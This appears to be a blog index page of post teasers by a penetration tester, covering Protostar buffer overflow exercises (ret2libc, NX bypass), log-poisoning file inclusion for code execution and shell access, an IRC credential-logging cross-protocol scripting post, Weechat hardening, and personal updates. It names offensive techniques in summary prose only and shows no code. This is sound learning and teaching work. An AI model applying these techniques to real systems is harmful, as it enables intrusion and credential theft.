Today’s learning’s – More overflows, ret2libc, opcode and more

This post is a part of my “Today’s Learning’s”  series. If you’re interested in, or wonder why, I’m writing these posts please read my article named “My Journey Through 2015“.

So! Another day, more learning. Today has been a really good day for me. I’m still working on the Protostar Stack exercises, and this time I learned about how to do basic debugging of shellcode by using the opcode for INT3 debugger trap instruction. Also learned how to bypass No-eXecute (NX) protection using return to libc (ret2libc) method, and more…

Continue reading Today’s learning’s – More overflows, ret2libc, opcode and more

Today’s learning’s – Buffer overflow, gdb, and more

Welcome to the first article in my “today’s learning’s” series. Last night and today I have been working on the Stack exercises in Protostar from exploit-exercises.com. So far I’ve solved Stack 0 through 3. These exercises covers the basics of stack based buffer overflow vulnerability, and each exercise teaches you something new about it.

Even though they all have individual goals, I have set one goal myself which is to gain root shell as well as solving it as first intended.

Continue reading Today’s learning’s – Buffer overflow, gdb, and more

Installing, configuring and hardening Weechat on Linux

It’s sad to say, but the reality these days is that you can never feel safe anywhere. Not even online chatting with your friends. There are several default configurations that help disclosing sensitive information about you and the system you are running. This information can be of great value to malicious users. So in this article I will describe some steps you can take to feel a tiny bit more safe. Continue reading Installing, configuring and hardening Weechat on Linux

0x03 File Inclusion – Log poisoning to code execution

This article is a part of my file inclusion series. If you do not know about file inclusion vulnerability I suggest you read my introductory article on the topic.

In this article I will explain how we, in some scenarios, can use different types of logs on a server to gain remote execution and, in the end, shell access. This method is called log poisoning, and is the process of infecting a log file with malicious code. We can then use local file inclusion to load this code and execute arbitrary commands on the system.

This post is an extension of an old blog post I wrote which is now dead. So I’m bringing it back to life.
Continue reading 0x03 File Inclusion – Log poisoning to code execution

Things are calming down

This is a really quick update, just to show that the blog is not dead. Finally things are slowing down around here. No longer living in a maze of cardboard boxes and plastic bags and christmas is over. It’s been a hectic month, but now I’ve finally got time to sit down and work on my blog.

I’ve written some more on part 3 of my file inclusion series, and I expect to post it very soon, hopefully tomorrow.

I hope everyone has had a great christmas, and enjoyed the holiday with family and good friends.

Stressful times

I know that I have been promoting posts, and my file inclusion series around the web, and the third part of it is in the making. But I’m currently having an increase stress level in my real life working my day job as a developer, and just landed a remote job as a penetration tester. In addition to this we’re currently in the process of moving to a new house.

So with all of this running at the same time, I can not give the amount of focus on this blog as I would like to. When things settles down a bit I will continue again.

0x02 File Inclusion – Information harvesting

This article is a part of my file inclusion series. If you do not know about file inclusion vulnerability I suggest you read my introductory article on the topic.

In this article I will talk about how file inclusion can be used to harvest information. I will go into more technical details from this point, so I will assume that you have some really basic understanding of web application development when reading this. If not I suggest you find some basic tutorials on it and read through those first, before coming back to this article series. Continue reading 0x02 File Inclusion – Information harvesting

How I logged your credentials on IRC

So, the other day I was watching the “How I Met Your Girlfriend” videos from DefCon 18. Here Samy Kamkar talked about something I had never heard about before. Cross-Protocol Scripting (XPS). This caught my eye instantly and I just had to learn more about it which is what resulted in the code I’m about to present in this post. I immediately started playing around with the code presented in the video and just could not let it go. Continue reading How I logged your credentials on IRC